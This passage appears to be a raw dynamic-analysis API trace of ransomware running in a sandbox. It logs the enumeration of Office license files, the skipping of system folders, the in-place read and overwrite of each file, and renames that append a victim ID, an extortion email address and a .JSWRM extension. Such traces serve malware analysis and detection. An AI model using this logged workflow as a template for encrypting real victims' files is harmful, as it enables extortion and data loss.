lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0103.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0103.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0103.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0103.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0103.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.955] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0103.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0103.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.957] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4b7c515, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4b7c515, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4cd3aa8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x675b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Grace-ppd.xrm-ms", cAlternateFileName="MO90E0~1.XRM")) returned 1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.957] lstrcmpiW (lpString1="MondoR_Grace-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Grace-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0103.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0103.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Grace-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2412e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0103.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Grace-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0103.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0103.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Grace-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x241290, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0103.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0103.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0103.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0103.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.958] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26459) returned 1 [0103.958] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6750) returned 0x24c1d0 [0103.958] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6750, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6750, lpOverlapped=0x0) returned 1 [0103.961] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.961] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6750, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6750, lpOverlapped=0x0) returned 1 [0103.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.961] CloseHandle (hObject=0x45c) returned 1 [0103.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0103.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0103.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0103.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0103.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0103.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0103.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.962] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0103.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0103.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0103.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0103.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0103.963] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4b09e82, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4b09e82, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4c14eea, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d45, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Grace-ul-oob.xrm-ms", cAlternateFileName="MOFCF1~1.XRM")) returned 1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.963] lstrcmpiW (lpString1="MondoR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0103.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Grace-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0103.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0103.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Grace-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0103.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0103.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Grace-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0103.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0103.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Grace-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241100, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0103.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0103.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0103.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0103.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.964] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11589) returned 1 [0103.964] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0103.964] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0103.966] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.966] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0103.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.966] CloseHandle (hObject=0x45c) returned 1 [0103.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0103.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0103.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0103.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0103.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0103.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0103.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.967] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0103.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0103.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0103.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0103.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0103.968] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4a97702, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4a97702, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4ba2739, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3080, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_KMS_Automation-ppd.xrm-ms", cAlternateFileName="MO1A2F~1.XRM")) returned 1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2=".") returned 1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2="..") returned 1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2="...") returned 1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2="windows") returned -1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.968] lstrcmpiW (lpString1="MondoR_KMS_Automation-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0103.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_KMS_Automation-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0103.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0103.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_KMS_Automation-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0103.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0103.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.969] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=12416) returned 1 [0103.969] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3080) returned 0x24c1d0 [0103.969] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3080, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x3080, lpOverlapped=0x0) returned 1 [0103.971] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 